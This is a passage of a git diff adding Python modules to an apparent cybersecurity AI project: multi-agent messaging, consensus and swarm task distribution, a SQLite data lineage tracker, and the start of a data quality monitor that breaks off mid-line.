+import websockets +import aiohttp + +from ..utils.logging_system import CyberLLMLogger, CyberLLMError, ErrorCategory +from ..memory.persistent_memory import PersistentMemoryManager +from ..cognitive.meta_cognitive import MetaCognitiveEngine + +class MessageType(Enum): + """Agent communication message types""" + TASK_REQUEST = "task_request" + TASK_RESPONSE = "task_response" + INFORMATION_SHARE = "information_share" + COORDINATION_REQUEST = "coordination_request" + CONSENSUS_PROPOSAL = "consensus_proposal" + CONSENSUS_VOTE = "consensus_vote" + CAPABILITY_ANNOUNCEMENT = "capability_announcement" + RESOURCE_REQUEST = "resource_request" + RESOURCE_OFFER = "resource_offer" + SWARM_DIRECTIVE = "swarm_directive" + EMERGENCY_ALERT = "emergency_alert" + +class AgentRole(Enum): + """Agent roles in the collaboration framework""" + LEADER = "leader" + SPECIALIST = "specialist" + COORDINATOR = "coordinator" + SCOUT = "scout" + ANALYZER = "analyzer" + EXECUTOR = "executor" + MONITOR = "monitor" + +class ConsensusAlgorithm(Enum): + """Consensus algorithms for decision making""" + MAJORITY_VOTE = "majority_vote" + WEIGHTED_VOTE = "weighted_vote" + BYZANTINE_FAULT_TOLERANT = "byzantine_fault_tolerant" + PROOF_OF_EXPERTISE = "proof_of_expertise" + RAFT = "raft" + +@dataclass +class AgentMessage: + """Inter-agent communication message""" + message_id: str + sender_id: str + recipient_id: Optional[str] # None for broadcast + message_type: MessageType + timestamp: datetime + + # Content + content: Dict[str, Any] + priority: int = 5 # 1-10, 10 = highest + + # Routing and delivery + ttl: int = 300 # Time to live in seconds + requires_acknowledgment: bool = False + correlation_id: Optional[str] = None + + # Security + signature: Optional[str] = None + encrypted: bool = False + +@dataclass +class AgentCapability: + """Agent capability description""" + capability_id: str + name: str + description: str + + # Performance metrics + accuracy: float + speed: float # Operations per second + resource_cost: float + + # Availability + available: bool = True + current_load: float = 0.0 + max_concurrent: int = 10 + + # Requirements + required_resources: Dict[str, float] = field(default_factory=dict) + dependencies: List[str] = field(default_factory=list) + +@dataclass +class SwarmTask: + """Task for swarm execution""" + task_id: str + description: str + task_type: str + + # Requirements + required_capabilities: List[str] + estimated_complexity: float + deadline: Optional[datetime] = None + + # Decomposition + subtasks: List['SwarmTask'] = field(default_factory=list) + dependencies: List[str] = field(default_factory=list) + + # Assignment + assigned_agents: List[str] = field(default_factory=list) + status: str = "pending" + + # Results + results: Dict[str, Any] = field(default_factory=dict) + completion_time: Optional[datetime] = None + +class AgentCommunicationProtocol: + """Standardized protocol for agent communication""" + + def __init__(self, agent_id: str, logger: Optional[CyberLLMLogger] = None): + self.agent_id = agent_id + self.logger = logger or CyberLLMLogger(name="agent_protocol") + + # Communication infrastructure + self.message_queue = asyncio.Queue() + self.active_connections = {} + self.message_handlers = {} + self.acknowledgments = {} + + # Protocol state + self.capabilities = {} + self.peer_agents = {} + self.conversation_contexts = {} + + # Security + self.trusted_agents = set() + self.encryption_keys = {} + + self.logger.info("Agent Communication Protocol initialized", agent_id=agent_id) + + async def send_message(self, message: AgentMessage) -> bool: + """Send message to another agent or broadcast""" + + try: + # Validate message + if not self._validate_message(message): + self.logger.error("Invalid message", message_id=message.message_id) + return False + + # Add timestamp and sender + message.timestamp = datetime.now() + message.sender_id = self.agent_id + + # Sign message if required + if message.encrypted or message.signature: + message = await self._secure_message(message) + + # Route message + if message.recipient_id: + # Direct message + success = await self._send_direct_message(message) + else: + # Broadcast message + success = await self._broadcast_message(message) + + # Handle acknowledgment requirement + if message.requires_acknowledgment and success: + asyncio.create_task(self._wait_for_acknowledgment(message)) + + self.logger.info("Message sent", + message_id=message.message_id, + recipient=message.recipient_id or "broadcast", + type=message.message_type.value) + + return success + + except Exception as e: + self.logger.error("Failed to send message", error=str(e)) + return False + + async def receive_message(self) -> Optional[AgentMessage]: + """Receive next message from queue""" + + try: + # Get message from queue (with timeout) + message = await asyncio.wait_for(self.message_queue.get(), timeout=1.0) + + # Validate and process message + if self._validate_received_message(message): + await self._process_received_message(message) + return message + + return None + + except asyncio.TimeoutError: + return None + except Exception as e: + self.logger.error("Failed to receive message", error=str(e)) + return None + + async def register_capability(self, capability: AgentCapability): + """Register agent capability""" + + self.capabilities[capability.capability_id] = capability + + # Announce capability to other agents + announcement = AgentMessage( + message_id=str(uuid.uuid4()), + sender_id=self.agent_id, + recipient_id=None, # Broadcast + message_type=MessageType.CAPABILITY_ANNOUNCEMENT, + timestamp=datetime.now(), + content={ + "capability": { + "id": capability.capability_id, + "name": capability.name, + "description": capability.description, + "accuracy": capability.accuracy, + "speed": capability.speed, + "available": capability.available + } + } + ) + + await self.send_message(announcement) + + self.logger.info("Capability registered and announced", + capability_id=capability.capability_id, + name=capability.name) + +class DistributedConsensus: + """Distributed consensus mechanisms for multi-agent decisions""" + + def __init__(self, + agent_id: str, + communication_protocol: AgentCommunicationProtocol, + logger: Optional[CyberLLMLogger] = None): + + self.agent_id = agent_id + self.protocol = communication_protocol + self.logger = logger or CyberLLMLogger(name="consensus") + + # Consensus state + self.active_proposals = {} + self.voting_history = deque(maxlen=1000) + self.consensus_results = {} + + # Agent weights for weighted voting + self.agent_weights = {} + + self.logger.info("Distributed Consensus initialized", agent_id=agent_id) + + async def propose_consensus(self, + proposal_id: str, + proposal_content: Dict[str, Any], + algorithm: ConsensusAlgorithm = ConsensusAlgorithm.MAJORITY_VOTE, + timeout: int = 300) -> Dict[str, Any]: + """Propose a decision for consensus""" + + try: + proposal = { + "proposal_id": proposal_id, + "proposer": self.agent_id, + "content": proposal_content, + "algorithm": algorithm.value, + "created_at": datetime.now().isoformat(), + "timeout": timeout, + "votes": {}, + "status": "active" + } + + self.active_proposals[proposal_id] = proposal + + # Broadcast proposal + message = AgentMessage( + message_id=str(uuid.uuid4()), + sender_id=self.agent_id, + recipient_id=None, # Broadcast + message_type=MessageType.CONSENSUS_PROPOSAL, + timestamp=datetime.now(), + content=proposal, + ttl=timeout + ) + + await self.protocol.send_message(message) + + # Wait for consensus or timeout + result = await self._wait_for_consensus(proposal_id, timeout) + + self.logger.info("Consensus proposal completed", + proposal_id=proposal_id, + result=result.get("decision"), + votes_received=len(result.get("votes", {}))) + + return result + + except Exception as e: + self.logger.error("Consensus proposal failed", error=str(e)) + return {"decision": "failed", "error": str(e)} + + async def vote_on_proposal(self, + proposal_id: str, + vote: Union[bool, float, str], + justification: Optional[str] = None) -> bool: + """Vote on an active proposal""" + + try: + if proposal_id not in self.active_proposals: + self.logger.warning("Unknown proposal", proposal_id=proposal_id) + return False + + proposal = self.active_proposals[proposal_id] + + # Create vote message + vote_content = { + "proposal_id": proposal_id, + "vote": vote, + "voter": self.agent_id, + "timestamp": datetime.now().isoformat(), + "justification": justification + } + + message = AgentMessage( + message_id=str(uuid.uuid4()), + sender_id=self.agent_id, + recipient_id=proposal["proposer"], + message_type=MessageType.CONSENSUS_VOTE, + timestamp=datetime.now(), + content=vote_content + ) + + await self.protocol.send_message(message) + + # Record vote locally + self.voting_history.append((datetime.now(), proposal_id, vote)) + + self.logger.info("Vote submitted", + proposal_id=proposal_id, + vote=vote) + + return True + + except Exception as e: + self.logger.error("Failed to vote on proposal", error=str(e)) + return False + +class SwarmIntelligence: + """Swarm intelligence capabilities for emergent behavior""" + + def __init__(self, + agent_id: str, + communication_protocol: AgentCommunicationProtocol, + memory_manager: PersistentMemoryManager, + logger: Optional[CyberLLMLogger] = None): + + self.agent_id = agent_id + self.protocol = communication_protocol + self.memory_manager = memory_manager + self.logger = logger or CyberLLMLogger(name="swarm_intelligence") + + # Swarm state + self.swarm_members = set() + self.role = AgentRole.SPECIALIST + self.current_tasks = {} + + # Intelligence mechanisms + self.pheromone_trails = defaultdict(float) + self.collective_knowledge = {} + self.emergence_patterns = {} + + # Task distribution + self.task_queue = asyncio.Queue() + self.completed_tasks = deque(maxlen=1000) + + self.logger.info("Swarm Intelligence initialized", agent_id=agent_id) + + async def join_swarm(self, swarm_id: str, role: AgentRole = AgentRole.SPECIALIST): + """Join a swarm with specified role""" + + try: + self.role = role + self.swarm_members.add(self.agent_id) + + # Announce joining + message = AgentMessage( + message_id=str(uuid.uuid4()), + sender_id=self.agent_id, + recipient_id=None, # Broadcast + message_type=MessageType.INFORMATION_SHARE, + timestamp=datetime.now(), + content={ + "action": "join_swarm", + "swarm_id": swarm_id, + "role": role.value, + "agent_capabilities": list(self.protocol.capabilities.keys()) + } + ) + + await self.protocol.send_message(message) + + # Start swarm behaviors + asyncio.create_task(self._run_swarm_behaviors()) + + self.logger.info("Joined swarm", + swarm_id=swarm_id, + role=role.value) + + except Exception as e: + self.logger.error("Failed to join swarm", error=str(e)) + + async def distribute_task(self, task: SwarmTask) -> str: + """Distribute task across swarm members""" + + try: + # Analyze task requirements + task_requirements = await self._analyze_task_requirements(task) + + # Find suitable agents + suitable_agents = await self._find_suitable_agents(task_requirements) + + if not suitable_agents: + self.logger.warning("No suitable agents found for task", task_id=task.task_id) + return "failed" + + # Decompose task if needed + if len(task.required_capabilities) > 1 or task.estimated_complexity > 0.7: + subtasks = await self._decompose_task(task) + if subtasks: + # Distribute subtasks + for subtask in subtasks: + await self.distribute_task(subtask) + return "distributed" + + # Assign task to best agent + best_agent = await self._select_best_agent(suitable_agents, task_requirements) + + # Send task assignment + task_message = AgentMessage( + message_id=str(uuid.uuid4()), + sender_id=self.agent_id, + recipient_id=best_agent, + message_type=MessageType.TASK_REQUEST, + timestamp=datetime.now(), + content={ + "task": { + "id": task.task_id, + "description": task.description, + "type": task.task_type, + "complexity": task.estimated_complexity, + "deadline": task.deadline.isoformat() if task.deadline else None, + "requirements": task_requirements + } + }, + requires_acknowledgment=True + ) + + await self.protocol.send_message(task_message) + + # Update task status + task.assigned_agents = [best_agent] + task.status = "assigned" + self.current_tasks[task.task_id] = task + + self.logger.info("Task distributed", + task_id=task.task_id, + assigned_agent=best_agent) + + return "assigned" + + except Exception as e: + self.logger.error("Task distribution failed", error=str(e)) + return "failed" + + async def execute_collective_problem_solving(self, + problem: Dict[str, Any]) -> Dict[str, Any]: + """Execute collective problem solving using swarm intelligence""" + + try: + problem_id = problem.get("id", str(uuid.uuid4())) + + self.logger.info("Starting collective problem solving", problem_id=problem_id) + + # Phase 1: Problem decomposition + subproblems = await self._decompose_problem(problem) + + # Phase 2: Distribute subproblems + partial_solutions = [] + for subproblem in subproblems: + solution = await self._solve_subproblem_collectively(subproblem) + partial_solutions.append(solution) + + # Phase 3: Solution synthesis + final_solution = await self._synthesize_solutions(partial_solutions, problem) + + # Phase 4: Validation through consensus + validation_result = await self._validate_solution_collectively( + final_solution, problem) + + # Store in collective knowledge + self.collective_knowledge[problem_id] = { + "problem": problem, + "solution": final_solution, + "validation": validation_result, + "timestamp": datetime.now().isoformat(), + "participating_agents": list(self.swarm_members) + } + + # Update pheromone trails for successful patterns + if validation_result.get("valid", False): + await self._update_pheromone_trails(problem, final_solution) + + self.logger.info("Collective problem solving completed", + problem_id=problem_id, + solution_quality=validation_result.get("quality", 0.0)) + + return { + "problem_id": problem_id, + "solution": final_solution, + "validation": validation_result, + "collective_intelligence_applied": True + } + + except Exception as e: + self.logger.error("Collective problem solving failed", error=str(e)) + return {"problem_id": problem_id, "error": str(e)} + +class TaskDistributionEngine: + """Advanced task distribution and load balancing""" + + def __init__(self, logger: Optional[CyberLLMLogger] = None): + self.logger = logger or CyberLLMLogger(name="task_distribution") + self.agent_loads = defaultdict(float) + self.task_history = deque(maxlen=10000) + self.performance_metrics = defaultdict(dict) + + async def distribute_workload(self, + tasks: List[SwarmTask], + available_agents: Dict[str, AgentCapability]) -> Dict[str, List[str]]: + """Distribute workload optimally across agents""" + + try: + # Calculate agent scores for each task + task_assignments = {} + + for task in tasks: + best_agent = await self._find_optimal_agent(task, available_agents) + if best_agent: + if best_agent not in task_assignments: + task_assignments[best_agent] = [] + task_assignments[best_agent].append(task.task_id) + + # Update agent load + self.agent_loads[best_agent] += task.estimated_complexity + + self.logger.info("Workload distributed", + tasks_count=len(tasks), + agents_used=len(task_assignments)) + + return task_assignments + + except Exception as e: + self.logger.error("Workload distribution failed", error=str(e)) + return {} + +# Factory functions +def create_communication_protocol(agent_id: str, **kwargs) -> AgentCommunicationProtocol: + """Create agent communication protocol""" + return AgentCommunicationProtocol(agent_id, **kwargs) + +def create_distributed_consensus(agent_id: str, + protocol: AgentCommunicationProtocol, + **kwargs) -> DistributedConsensus: + """Create distributed consensus manager""" + return DistributedConsensus(agent_id, protocol, **kwargs) + +def create_swarm_intelligence(agent_id: str, + protocol: AgentCommunicationProtocol, + memory_manager: PersistentMemoryManager, + **kwargs) -> SwarmIntelligence: + """Create swarm intelligence engine""" + return SwarmIntelligence(agent_id, protocol, memory_manager, **kwargs) diff --git a/src/data/lineage_tracker.py b/src/data/lineage_tracker.py new file mode 100644 index 0000000000000000000000000000000000000000..ce0746454a86e24658724572d0a0ee603b4f7e60 --- /dev/null +++ b/src/data/lineage_tracker.py @@ -0,0 +1,483 @@ +""" +Data Lineage Tracking System +Tracks data flow, transformations, and dependencies across the cybersecurity AI pipeline +""" + +import json +import sqlite3 +import hashlib +from datetime import datetime +from pathlib import Path +from typing import Dict, List, Optional, Any +from dataclasses import dataclass, asdict +from enum import Enum + +class DataSourceType(Enum): + RAW_DATA = "raw_data" + MITRE_ATTACK = "mitre_attack" + CVE_DATABASE = "cve_database" + THREAT_INTEL = "threat_intel" + RED_TEAM_LOGS = "red_team_logs" + DEFENSIVE_KNOWLEDGE = "defensive_knowledge" + PREPROCESSED = "preprocessed" + TRANSFORMED = "transformed" + VALIDATED = "validated" + AUGMENTED = "augmented" + +class TransformationType(Enum): + CLEANING = "cleaning" + NORMALIZATION = "normalization" + TOKENIZATION = "tokenization" + AUGMENTATION = "augmentation" + VALIDATION = "validation" + FEATURE_EXTRACTION = "feature_extraction" + ANONYMIZATION = "anonymization" + AGGREGATION = "aggregation" + +@dataclass +class DataAsset: + """Represents a data asset in the lineage graph""" + asset_id: str + name: str + source_type: DataSourceType + file_path: str + size_bytes: int + checksum: str + created_at: str + schema_version: str + metadata: Dict[str, Any] + +@dataclass +class DataTransformation: + """Represents a data transformation operation""" + transformation_id: str + transformation_type: TransformationType + source_assets: List[str] + target_assets: List[str] + operation_name: str + parameters: Dict[str, Any] + executed_at: str + execution_time_seconds: float + success: bool + error_message: Optional[str] + +@dataclass +class DataLineageNode: + """Node in the data lineage graph""" + node_id: str + asset: DataAsset + upstream_nodes: List[str] + downstream_nodes: List[str] + transformations: List[str] + +class DataLineageTracker: + """Tracks data lineage across the cybersecurity AI pipeline""" + + def __init__(self, db_path: str = "data/lineage/data_lineage.db"): + self.db_path = Path(db_path) + self.db_path.parent.mkdir(parents=True, exist_ok=True) + self._init_database() + + def _init_database(self): + """Initialize the lineage database""" + conn = sqlite3.connect(self.db_path) + cursor = conn.cursor() + + # Data Assets table + cursor.execute(""" + CREATE TABLE IF NOT EXISTS data_assets ( + asset_id TEXT PRIMARY KEY, + name TEXT NOT NULL, + source_type TEXT NOT NULL, + file_path TEXT NOT NULL, + size_bytes INTEGER NOT NULL, + checksum TEXT NOT NULL, + created_at TEXT NOT NULL, + schema_version TEXT NOT NULL, + metadata TEXT NOT NULL + ) + """) + + # Data Transformations table + cursor.execute(""" + CREATE TABLE IF NOT EXISTS data_transformations ( + transformation_id TEXT PRIMARY KEY, + transformation_type TEXT NOT NULL, + source_assets TEXT NOT NULL, + target_assets TEXT NOT NULL, + operation_name TEXT NOT NULL, + parameters TEXT NOT NULL, + executed_at TEXT NOT NULL, + execution_time_seconds REAL NOT NULL, + success BOOLEAN NOT NULL, + error_message TEXT + ) + """) + + # Lineage Relationships table + cursor.execute(""" + CREATE TABLE IF NOT EXISTS lineage_relationships ( + id INTEGER PRIMARY KEY AUTOINCREMENT, + parent_asset_id TEXT NOT NULL, + child_asset_id TEXT NOT NULL, + transformation_id TEXT NOT NULL, + relationship_type TEXT NOT NULL, + created_at TEXT NOT NULL, + FOREIGN KEY (parent_asset_id) REFERENCES data_assets (asset_id), + FOREIGN KEY (child_asset_id) REFERENCES data_assets (asset_id), + FOREIGN KEY (transformation_id) REFERENCES data_transformations (transformation_id) + ) + """) + + # Create indices for performance + cursor.execute("CREATE INDEX IF NOT EXISTS idx_assets_source_type ON data_assets(source_type)") + cursor.execute("CREATE INDEX IF NOT EXISTS idx_transformations_type ON data_transformations(transformation_type)") + cursor.execute("CREATE INDEX IF NOT EXISTS idx_relationships_parent ON lineage_relationships(parent_asset_id)") + cursor.execute("CREATE INDEX IF NOT EXISTS idx_relationships_child ON lineage_relationships(child_asset_id)") + + conn.commit() + conn.close() + + def register_data_asset(self, asset: DataAsset) -> bool: + """Register a new data asset""" + try: + conn = sqlite3.connect(self.db_path) + cursor = conn.cursor() + + cursor.execute(""" + INSERT OR REPLACE INTO data_assets + (asset_id, name, source_type, file_path, size_bytes, checksum, + created_at, schema_version, metadata) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?) + """, ( + asset.asset_id, asset.name, asset.source_type.value, + asset.file_path, asset.size_bytes, asset.checksum, + asset.created_at, asset.schema_version, json.dumps(asset.metadata) + )) + + conn.commit() + conn.close() + return True + + except Exception as e: + print(f"Error registering data asset: {e}") + return False + + def register_transformation(self, transformation: DataTransformation) -> bool: + """Register a data transformation operation""" + try: + conn = sqlite3.connect(self.db_path) + cursor = conn.cursor() + + cursor.execute(""" + INSERT OR REPLACE INTO data_transformations + (transformation_id, transformation_type, source_assets, target_assets, + operation_name, parameters, executed_at, execution_time_seconds, + success, error_message) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?) + """, ( + transformation.transformation_id, transformation.transformation_type.value, + json.dumps(transformation.source_assets), json.dumps(transformation.target_assets), + transformation.operation_name, json.dumps(transformation.parameters), + transformation.executed_at, transformation.execution_time_seconds, + transformation.success, transformation.error_message + )) + + # Register lineage relationships + for source_id in transformation.source_assets: + for target_id in transformation.target_assets: + cursor.execute(""" + INSERT INTO lineage_relationships + (parent_asset_id, child_asset_id, transformation_id, relationship_type, created_at) + VALUES (?, ?, ?, ?, ?) + """, (source_id, target_id, transformation.transformation_id, "transformation", transformation.executed_at)) + + conn.commit() + conn.close() + return True + + except Exception as e: + print(f"Error registering transformation: {e}") + return False + + def get_asset_lineage(self, asset_id: str, direction: str = "both") -> Dict[str, Any]: + """Get the lineage graph for a specific asset""" + conn = sqlite3.connect(self.db_path) + cursor = conn.cursor() + + lineage = { + "asset_id": asset_id, + "upstream": [], + "downstream": [], + "transformations": [] + } + + # Get upstream lineage + if direction in ["upstream", "both"]: + cursor.execute(""" + SELECT DISTINCT lr.parent_asset_id, da.name, da.source_type, dt.operation_name + FROM lineage_relationships lr + JOIN data_assets da ON lr.parent_asset_id = da.asset_id + JOIN data_transformations dt ON lr.transformation_id = dt.transformation_id + WHERE lr.child_asset_id = ? + """, (asset_id,)) + + lineage["upstream"] = [ + { + "asset_id": row[0], + "name": row[1], + "source_type": row[2], + "operation": row[3] + } + for row in cursor.fetchall() + ] + + # Get downstream lineage + if direction in ["downstream", "both"]: + cursor.execute(""" + SELECT DISTINCT lr.child_asset_id, da.name, da.source_type, dt.operation_name + FROM lineage_relationships lr + JOIN data_assets da ON lr.child_asset_id = da.asset_id + JOIN data_transformations dt ON lr.transformation_id = dt.transformation_id + WHERE lr.parent_asset_id = ? + """, (asset_id,)) + + lineage["downstream"] = [ + { + "asset_id": row[0], + "name": row[1], + "source_type": row[2], + "operation": row[3] + } + for row in cursor.fetchall() + ] + + # Get transformations involving this asset + cursor.execute(""" + SELECT dt.transformation_id, dt.operation_name, dt.executed_at, dt.success + FROM data_transformations dt + WHERE JSON_EXTRACT(dt.source_assets, '$') LIKE '%' || ? || '%' + OR JSON_EXTRACT(dt.target_assets, '$') LIKE '%' || ? || '%' + """, (asset_id, asset_id)) + + lineage["transformations"] = [ + { + "transformation_id": row[0], + "operation_name": row[1], + "executed_at": row[2], + "success": bool(row[3]) + } + for row in cursor.fetchall() + ] + + conn.close() + return lineage + + def get_data_flow_impact(self, asset_id: str) -> Dict[str, Any]: + """Analyze the impact of changes to a specific data asset""" + lineage = self.get_asset_lineage(asset_id, direction="downstream") + + impact_analysis = { + "source_asset": asset_id, + "affected_assets": len(lineage["downstream"]), + "affected_asset_types": {}, + "critical_dependencies": [], + "recommendation": "" + } + + # Count affected asset types + for asset in lineage["downstream"]: + asset_type = asset["source_type"] + impact_analysis["affected_asset_types"][asset_type] = ( + impact_analysis["affected_asset_types"].get(asset_type, 0) + 1 + ) + + # Identify critical dependencies + conn = sqlite3.connect(self.db_path) + cursor = conn.cursor() + + cursor.execute(""" + SELECT da.asset_id, da.name, da.source_type + FROM data_assets da + WHERE da.source_type IN ('validated', 'augmented', 'transformed') + AND da.asset_id IN ( + SELECT lr.child_asset_id + FROM lineage_relationships lr + WHERE lr.parent_asset_id = ? + ) + """, (asset_id,)) + + impact_analysis["critical_dependencies"] = [ + {"asset_id": row[0], "name": row[1], "type": row[2]} + for row in cursor.fetchall() + ] + + # Generate recommendation + if impact_analysis["affected_assets"] > 10: + impact_analysis["recommendation"] = "HIGH IMPACT: Changes require comprehensive testing" + elif impact_analysis["affected_assets"] > 5: + impact_analysis["recommendation"] = "MEDIUM IMPACT: Changes require targeted testing" + else: + impact_analysis["recommendation"] = "LOW IMPACT: Standard validation sufficient" + + conn.close() + return impact_analysis + + def generate_lineage_report(self) -> Dict[str, Any]: + """Generate a comprehensive data lineage report""" + conn = sqlite3.connect(self.db_path) + cursor = conn.cursor() + + report = { + "generated_at": datetime.now().isoformat(), + "summary": {}, + "asset_types": {}, + "transformation_types": {}, + "data_quality": {}, + "recommendations": [] + } + + # Summary statistics + cursor.execute("SELECT COUNT(*) FROM data_assets") + total_assets = cursor.fetchone()[0] + + cursor.execute("SELECT COUNT(*) FROM data_transformations") + total_transformations = cursor.fetchone()[0] + + cursor.execute("SELECT COUNT(*) FROM lineage_relationships") + total_relationships = cursor.fetchone()[0] + + report["summary"] = { + "total_assets": total_assets, + "total_transformations": total_transformations, + "total_relationships": total_relationships + } + + # Asset type distribution + cursor.execute(""" + SELECT source_type, COUNT(*), AVG(size_bytes) + FROM data_assets + GROUP BY source_type + """) + + for row in cursor.fetchall(): + report["asset_types"][row[0]] = { + "count": row[1], + "avg_size_bytes": row[2] + } + + # Transformation type distribution + cursor.execute(""" + SELECT transformation_type, COUNT(*), AVG(execution_time_seconds), + SUM(CASE WHEN success = 1 THEN 1 ELSE 0 END) * 100.0 / COUNT(*) + FROM data_transformations + GROUP BY transformation_type + """) + + for row in cursor.fetchall(): + report["transformation_types"][row[0]] = { + "count": row[1], + "avg_execution_time": row[2], + "success_rate": row[3] + } + + # Data quality metrics + cursor.execute(""" + SELECT + COUNT(*) as total, + SUM(CASE WHEN source_type IN ('validated', 'augmented') THEN 1 ELSE 0 END) as high_quality, + AVG(size_bytes) as avg_size + FROM data_assets + """) + + row = cursor.fetchone() + report["data_quality"] = { + "total_assets": row[0], + "high_quality_assets": row[1], + "quality_percentage": (row[1] / row[0] * 100) if row[0] > 0 else 0, + "average_asset_size": row[2] + } + + # Generate recommendations + if report["data_quality"]["quality_percentage"] < 70: + report["recommendations"].append("Increase data validation and quality assurance processes") + + if any(info["success_rate"] < 90 for info in report["transformation_types"].values()): + report["recommendations"].append("Review and optimize failing data transformations") + + if report["summary"]["total_relationships"] / report["summary"]["total_assets"] < 1.5: + report["recommendations"].append("Consider enriching data lineage tracking") + + conn.close() + return report + + def create_asset_from_file(self, file_path: str, source_type: DataSourceType, + name: Optional[str] = None, metadata: Optional[Dict] = None) -> DataAsset: + """Create a DataAsset from a file""" + path = Path(file_path) + + if not path.exists(): + raise FileNotFoundError(f"File not found: {file_path}") + + # Calculate file checksum + hasher = hashlib.sha256() + with open(path, 'rb') as f: + for chunk in iter(lambda: f.read(4096), b""): + hasher.update(chunk) + + asset_id = f"{source_type.value}_{hasher.hexdigest()[:16]}" + + return DataAsset( + asset_id=asset_id, + name=name or path.name, + source_type=source_type, + file_path=str(path.absolute()), + size_bytes=path.stat().st_size, + checksum=hasher.hexdigest(), + created_at=datetime.now().isoformat(), + schema_version="1.0", + metadata=metadata or {} + ) + +# Example usage and testing +if __name__ == "__main__": + # Initialize the tracker + tracker = DataLineageTracker("data/lineage/data_lineage.db") + + # Example: Track MITRE ATT&CK data processing + mitre_asset = DataAsset( + asset_id="mitre_attack_raw_001", + name="MITRE ATT&CK Framework Data", + source_type=DataSourceType.MITRE_ATTACK, + file_path="data/raw/mitre_attack.json", + size_bytes=1024000, + checksum="abc123def456", + created_at=datetime.now().isoformat(), + schema_version="1.0", + metadata={"version": "14.1", "techniques": 200} + ) + + tracker.register_data_asset(mitre_asset) + + # Track preprocessing transformation + preprocessing = DataTransformation( + transformation_id="preprocess_001", + transformation_type=TransformationType.CLEANING, + source_assets=["mitre_attack_raw_001"], + target_assets=["mitre_attack_clean_001"], + operation_name="clean_and_normalize_mitre_data", + parameters={"remove_deprecated": True, "normalize_names": True}, + executed_at=datetime.now().isoformat(), + execution_time_seconds=15.7, + success=True, + error_message=None + ) + + tracker.register_transformation(preprocessing) + + # Generate lineage report + report = tracker.generate_lineage_report() + print("Data Lineage Report:") + print(json.dumps(report, indent=2)) + + print("โœ… Data Lineage Tracking System implemented and tested") diff --git a/src/data/quality_monitor.py b/src/data/quality_monitor.py new file mode 100644 index 0000000000000000000000000000000000000000..4a2435bc776f521ec978c2b6e2c6af2715938013 --- /dev/null +++ b/src/data/quality_monitor.py @@ -0,0 +1,728 @@ +""" +Automated Data Quality Monitoring System +Monitors data quality metrics, detects anomalies, and ensures data integrity +""" + +import json +import sqlite3 +import numpy as np +import pandas as pd +from datetime import datetime, timedelta +from pathlib import Path +from typing import Dict, List, Optional, Any, Tuple +from dataclasses import dataclass, asdict +from enum import Enum +import hashlib +import re +import statistics + +class QualityMetricType(Enum): + COMPLETENESS = "completeness" + ACCURACY = "accuracy" + CONSISTENCY = "consistency" + VALIDITY = "validity" + UNIQUENESS = "uniqueness" + TIMELINESS = "timeliness" + RELEVANCE = "relevance" + +class AlertSeverity(Enum): + LOW = "low" + MEDIUM = "medium" + HIGH = "high" + CRITICAL = "critical" + +@dataclass +class QualityMetric: + """Represents a data quality metric measurement""" + metric_id: str + dataset_id: str + metric_type: QualityMetricType + value: float + threshold_min: float + threshold_max: float + measured_at: str + passed: bool + details: Dict[str, Any] + +@dataclass +class QualityAlert: + """Represents a data quality alert""" + alert_id: str + dataset_id: str + metric_type: QualityMetricType + severity: AlertSeverity + message: str + value: float + threshold: float + created_at: str + resolved_at: Optional[str] + resolved: bool + +@dataclass +class DatasetProfile: + """Statistical profile of a dataset""" + dataset_id: str + total_records: int + total_columns: int + null_percentage: float + duplicate_percentage: float + schema_hash: str + last_updated: str + column_profiles: Dict[str, Any] + +class DataQualityMonitor: + """Automated data quality monitoring system""" + + def __init__(self, db_path: str = "data/quality/data_quality.db"): + self.db_path = Path(db_path) + self.db_path.parent.mkdir(parents=True, exist_ok=True) + self._init_database() + self.quality_thresholds = self._load_default_thresholds() + + def _init_database(self): + """Initialize the quality monitoring database""" + conn = sqlite3.connect(self.db_path) + cursor = conn.cursor() + + # Quality Metrics table + cursor.execute(""" + CREATE TABLE IF NOT EXISTS quality_metrics ( + metric_id TEXT PRIMARY KEY, + dataset_id TEXT NOT NULL, + metric_type TEXT NOT NULL, + value REAL NOT NULL, + threshold_min REAL NOT NULL, + threshold_max REAL NOT NULL, + measured_at TEXT NOT NULL, + passed BOOLEAN NOT NULL, + details TEXT NOT NULL + ) + """) + + # Quality Alerts table + cursor.execute(""" + CREATE TABLE IF NOT EXISTS quality_alerts ( + alert_id TEXT PRIMARY KEY, + dataset_id TEXT NOT NULL, + metric_type TEXT NOT NULL, + severity TEXT NOT NULL, + message TEXT NOT NULL, + value REAL NOT NULL, + threshold REAL NOT NULL, + created_at TEXT NOT NULL, + resolved_at TEXT, + resolved BOOLEAN DEFAULT FALSE + ) + """) + + # Dataset Profiles table + cursor.execute(""" + CREATE TABLE IF NOT EXISTS dataset_profiles ( + dataset_id TEXT PRIMARY KEY, + total_records INTEGER NOT NULL, + total_columns INTEGER NOT NULL, + null_percentage REAL NOT NULL, + duplicate_percentage REAL NOT NULL, + schema_hash TEXT NOT NULL, + last_updated TEXT NOT NULL, + column_profiles TEXT NOT NULL + ) + """) + + # Quality Rules table + cursor.execute(""" + CREATE TABLE IF NOT EXISTS quality_rules ( + rule_id TEXT PRIMARY KEY, + dataset_pattern TEXT NOT NULL, + metric_type TEXT NOT NULL, + threshold_min REAL, + threshold_max REAL, + severity TEXT NOT NULL, + enabled BOOLEAN DEFAULT TRUE, + created_at TEXT NOT NULL + ) + """) + + # Create indices + cursor.execute("CREATE INDEX IF NOT EXISTS idx_metrics_dataset ON quality_metrics(dataset_id)") + cursor.execute("CREATE INDEX IF NOT EXISTS idx_metrics_type ON quality_metrics(metric_type)") + cursor.execute("CREATE INDEX IF NOT EXISTS idx_alerts_dataset ON quality_alerts(dataset_id)") + cursor.execute("CREATE INDEX IF NOT EXISTS idx_alerts_severity ON quality_alerts(severity)") + + conn.commit() + conn.close() + + def _load_default_thresholds(self) -> Dict[str, Dict[str, float]]: + """Load default quality thresholds for cybersecurity data""" + return { + "mitre_attack": { + "completeness": {"min": 0.95, "max": 1.0}, + "accuracy": {"min": 0.90, "max": 1.0}, + "consistency": {"min": 0.85, "max": 1.0}, + "validity": {"min": 0.95, "max": 1.0}, + "uniqueness": {"min": 0.98, "max": 1.0} + }, + "cve_data": { + "completeness": {"min": 0.90, "max": 1.0}, + "accuracy": {"min": 0.95, "max": 1.0}, + "timeliness": {"min": 0.80, "max": 1.0}, + "validity": {"min": 0.95, "max": 1.0} + }, + "threat_intel": { + "completeness": {"min": 